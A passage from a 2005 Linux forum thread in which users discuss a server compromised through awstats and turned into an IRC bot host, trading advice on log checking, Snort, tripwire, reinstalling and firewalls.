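On a live server, feed it the real file: `command_execution_evidence < /var/log/apache2/error_log`. A client that scores above zero should be cross-checked against access_log for the exact request, which is what identifies the vulnerable script (awstats here) rather than just the attacker's address.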
Gotterdammerung (l33t, Posts: 627, Joined: Wed Feb 11, 2004 1:42 pm, Location: Rio de Janeiro, Brazil)

Post by Gotterdammerung » Thu Oct 06, 2005 6:19 pm

Man, that's something that would really take my sweet dreams away.
A mind that is stretched by a new experience can never go back to its old dimensions. - Oliver Wendell Holmes
Matteo Azzali (Retired Dev, Posts: 1133, Joined: Thu Sep 23, 2004 4:25 pm)

Post by Matteo Azzali » Tue Oct 11, 2005 1:55 pm

drspewfy wrote: JUST FORMAT YOUR SYSTEM... and upgrade your system more often..

BUT-..... I'M CURIOUS.. CHECK ALL YOUR logs. how did he ROOT your box ????

set up SNORT, tripwire, snort_inline; also read step by step the security handbook of gentoo.org/doc .. and apply it on your server... ,
Seeya from Mexico
I want some explanation on these IRC bots:
Am I secure if IRC ports are closed on my firewall?
Is there any other way to get rid of them that's not formatting???
(malware scanner/remover....)
Could an app-centric firewall (checking both the complete executable path and
the checksum of the executable that generated/wants to receive the packets) protect me better?
Every day a new distro comes to birth. Every day a distro "eats" another.
If you're born distro, no matter what, start to run.
---- http://www.linuxprinting.org/ ---- http://tuxmobil.org/